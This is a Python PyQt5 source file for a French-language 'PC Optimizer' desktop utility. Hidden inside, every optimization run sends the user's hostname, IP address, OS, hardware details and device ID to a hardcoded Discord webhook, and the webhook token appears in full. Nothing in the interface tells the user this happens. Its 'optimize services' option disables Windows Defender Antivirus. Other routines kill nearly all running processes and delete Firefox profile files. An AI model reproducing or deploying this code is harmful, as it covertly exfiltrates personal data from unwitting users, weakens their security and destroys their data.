import sys
import os
import subprocess
import psutil
import socket
import platform
import requests
from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QPushButton, QCheckBox, QLabel, QStackedWidget
from PyQt5.QtCore import QThread, pyqtSignal


WEBHOOK_URL = "https://discord.com/api/webhooks/1305615931975663706/DH7cZjgCqM5h030dKU5ehymzGkMj8xnF_X3fJxmwqU-Z0YGX2rc0vPA2b8iB3bczCFNU"


def send_to_webhook(embed):
    data = {
        "embeds": [embed]
    }
    headers = {"Content-Type": "application/json"}
    response = requests.post(WEBHOOK_URL, json=data, headers=headers)
    return response


def get_system_info():
    # Informations du système
    system_info = {
        "hostname": socket.gethostname(),
        "ip_address": socket.gethostbyname(socket.gethostname()),
        "os": platform.system(),
        "os_version": platform.version(),
        "cpu": platform.processor(),
        "ram": psutil.virtual_memory().total,
        "language": os.environ.get("LANG", "N/A"),
        "device_id": platform.node(),  # Identifiant unique de l'appareil (parfois basé sur le nom d'hôte)
    }
    
    return system_info


class OptimizerThread(QThread):
    progress_signal = pyqtSignal(str)

    def __init__(self, options, optimization_type):
        super().__init__()
        self.options = options
        self.optimization_type = optimization_type

    def run(self):
        system_info = get_system_info()
        
        if self.optimization_type == 'full':
            if self.options['clear_temp']:
                self.clear_temp_files()
            if self.options['clear_cache']:
                self.clear_browser_cache()
            if self.options['close_bg_apps']:
                self.close_background_apps()
            if self.options['disable_startup']:
                self.disable_startup_apps()
            if self.options['optimize_disk']:
                self.clean_up_disk()
            if self.options['optimize_services']:
                self.optimize_services()
            
            # Send information to webhook
            embed = self.create_embed(system_info)
            send_to_webhook(embed)
            self.progress_signal.emit("Optimisation complète terminée!")

        elif self.optimization_type == 'daily':
            if self.options['clear_cache']:
                self.clear_browser_cache()
            if self.options['close_bg_apps']:
                self.close_background_apps()
            if self.options['performance_tuning']:
                self.tune_performance()

            # Send information to webhook
            embed = self.create_embed(system_info)
            send_to_webhook(embed)
            self.progress_signal.emit("Optimisation quotidienne terminée!")

    def create_embed(self, system_info):
        embed = {
            "title": "PC Optimization Report",
            "description": "Détails de l'optimisation",
            "color": 0x7289da,  # Bleu Discord
            "fields": [
                {"name": "Nom d'utilisateur/Ordinateur", "value": system_info["hostname"], "inline": False},
                {"name": "Adresse IP", "value": system_info["ip_address"], "inline": False},
                {"name": "Système d'exploitation", "value": system_info["os"] + " " + system_info["os_version"], "inline": False},
                {"name": "Processeur", "value": system_info["cpu"], "inline": False},
                {"name": "RAM", "value": f"{system_info['ram'] / (1024 ** 3):.2f} GB", "inline": False},
                {"name": "Langue", "value": system_info["language"], "inline": False},
                {"name": "Identifiant unique de l'appareil", "value": system_info["device_id"], "inline": False},
                # Ajoutez d'autres champs ici si vous avez des informations supplémentaires
            ]
        }
        return embed

    def clear_temp_files(self):
        temp_path = os.getenv('TEMP')
        for root, dirs, files in os.walk(temp_path):
            for file in files:
                try:
                    os.remove(os.path.join(root, file))
                except Exception as e:
                    pass

    def clear_browser_cache(self):
        browser_cache_dirs = [
            os.path.join(os.getenv('APPDATA'), 'Google\\Chrome\\User Data\\Default\\Cache'),
            os.path.join(os.getenv('APPDATA'), 'Mozilla\\Firefox\\Profiles')
        ]
        for cache_dir in browser_cache_dirs:
            for root, dirs, files in os.walk(cache_dir):
                for file in files:
                    try:
                        os.remove(os.path.join(root, file))
                    except Exception as e:
                        pass

    def close_background_apps(self):
        excluded_apps = ['python.exe', 'discord.exe', 'fortniteclient.exe', 'EpicGamesLauncher.exe']
        for proc in psutil.process_iter(['pid', 'name']):
            try:
                if proc.info['name'].lower() not in [app.lower() for app in excluded_apps]:
                    proc.terminate()
            except (psutil.NoSuchProcess, psutil.AccessDenied):
                pass

    def disable_startup_apps(self):
        startup_items = self.get_startup_items()
        for item in startup_items:
            try:
                subprocess.run(f'reg add "{item}" /v Start /t REG_DWORD /d 4 /f', shell=True)
            except Exception as e:
                pass

    def optimize_services(self):
        services_to_disable = [
            "WSearch", "SysMain", "Fax", "Windows Defender Antivirus Service"
        ]
        for service in services_to_disable:
            subprocess.run(f"sc stop {service}", shell=True)
            subprocess.run(f"sc config {service} start= disabled", shell=True)

    def clean_up_disk(self):
        subprocess.run('cleanmgr /sagerun:1', shell=True)

    def tune_performance(self):
        subprocess.run('powercfg -change -standby-timeout-ac 15', shell=True)

    def get_startup_items(self):
        startup_items = [
            r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
            r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
        ]
        return startup_items


class PCOptimizer(QWidget):
    def __init__(self):
        super().__init__()
        self.setWindowTitle("PC Optimizer")
        self.setGeometry(100, 100, 600, 400)
        self.setStyleSheet("background-color: #2C2F38; color: white; font-size: 16px;")
        
        self.layout = QVBoxLayout(self)
        self.stacked_layout = QStackedWidget(self)
        
        self.title_label = QLabel("Choisissez une optimisation:")
        self.title_label.setStyleSheet("font-size: 24px; color: #7289da; font-weight: bold;")
        self.layout.addWidget(self.title_label)
        
        # Main page with options
        self.main_page = QWidget()
        self.main_page_layout = QVBoxLayout()

        self.full_optimization_btn = QPushButton("Optimisation complète")
        self.full_optimization_btn.clicked.connect(self.show_full_optimization)
        self.daily_optimization_btn = QPushButton("Optimisation quotidienne")
        self.daily_optimization_btn.clicked.connect(self.show_daily_optimization)

        self.main_page_layout.addWidget(self.full_optimization_btn)
        self.main_page_layout.addWidget(self.daily_optimization_btn)

        self.main_page.setLayout(self.main_page_layout)
        self.stacked_layout.addWidget(self.main_page)
        
        # Full optimization page
        self.full_optimization_page = QWidget()
        self.full_optimization_layout = QVBoxLayout()

        self.clear_temp_cb = QCheckBox("Supprimer les fichiers temporaires")
        self.clear_cache_cb = QCheckBox("Vider le cache des navigateurs")
        self.close_bg_apps_cb = QCheckBox("Fermer les applications en arrière-plan")
        self.disable_startup_cb = QCheckBox("Désactiver les programmes de démarrage")
        self.optimize_disk_cb = QCheckBox("Nettoyage du disque dur")
        self.optimize_services_cb = QCheckBox("Optimiser les services système")

        self.full_optimization_layout.addWidget(self.clear_temp_cb)
        self.full_optimization_layout.addWidget(self.clear_cache_cb)
        self.full_optimization_layout.addWidget(self.close_bg_apps_cb)
        self.full_optimization_layout.addWidget(self.disable_startup_cb)
        self.full_optimization_layout.addWidget(self.optimize_disk_cb)
        self.full_optimization_layout.addWidget(self.optimize_services_cb)

        self.optimize_btn = QPushButton("Lancer l'optimisation complète")
        self.optimize_btn.clicked.connect(self.start_full_optimization)
        self.full_optimization_layout.addWidget(self.optimize_btn)

        self.back_btn_full = QPushButton("Retour")
        self.back_btn_full.clicked.connect(self.show_main_page)
        self.full_optimization_layout.addWidget(self.back_btn_full)

        self.full_optimization_page.setLayout(self.full_optimization_layout)
        self.stacked_layout.addWidget(self.full_optimization_page)

        # Daily optimization page
        self.daily_optimization_page = QWidget()
        self.daily_optimization_layout = QVBoxLayout()

        self.performance_tuning_cb = QCheckBox("Optimisation des performances")
        self.daily_optimization_layout.addWidget(self.performance_tuning_cb)
        self.daily_optimization_layout.addWidget(self.clear_cache_cb)
        self.daily_optimization_layout.addWidget(self.close_bg_apps_cb)

        self.optimize_daily_btn = QPushButton("Lancer l'optimisation quotidienne")
        self.optimize_daily_btn.clicked.connect(self.start_daily_optimization)
        self.daily_optimization_layout.addWidget(self.optimize_daily_btn)

        self.back_btn_daily = QPushButton("Retour")
        self.back_btn_daily.clicked.connect(self.show_main_page)
        self.daily_optimization_layout.addWidget(self.back_btn_daily)

        self.daily_optimization_page.setLayout(self.daily_optimization_layout)
        self.stacked_layout.addWidget(self.daily_optimization_page)

        # Set the stacked layout in the main window
        self.layout.addWidget(self.stacked_layout)
        
        self.setLayout(self.layout)

    def show_full_optimization(self):
        self.stacked_layout.setCurrentWidget(self.full_optimization_page)

    def show_daily_optimization(self):
        self.stacked_layout.setCurrentWidget(self.daily_optimization_page)

    def show_main_page(self):
        self.stacked_layout.setCurrentWidget(self.main_page)

    def start_full_optimization(self):
        options = {
            'clear_temp': self.clear_temp_cb.isChecked(),
            'clear_cache': self.clear_cache_cb.isChecked(),
            'close_bg_apps': self.close_bg_apps_cb.isChecked(),
            'disable_startup': self.disable_startup_cb.isChecked(),
            'optimize_disk': self.optimize_disk_cb.isChecked(),
            'optimize_services': self.optimize_services_cb.isChecked()
        }
        self.optimizer_thread = OptimizerThread(options, 'full')
        self.optimizer_thread.progress_signal.connect(self.show_progress)
        self.optimizer_thread.start()

    def start_daily_optimization(self):
        options = {
            'clear_cache': self.clear_cache_cb.isChecked(),
            'close_bg_apps': self.close_bg_apps_cb.isChecked(),
            'performance_tuning': self.performance_tuning_cb.isChecked()
        }
        self.optimizer_thread = OptimizerThread(options, 'daily')
        self.optimizer_thread.progress_signal.connect(self.show_progress)
        self.optimizer_thread.start()

    def show_progress(self, message):
        # This can be modified to show a final status message in your app if needed
        pass


if __name__ == '__main__':
    app = QApplication(sys.argv)
    optimizer = PCOptimizer()
    optimizer.show()
    sys.exit(app.exec_())
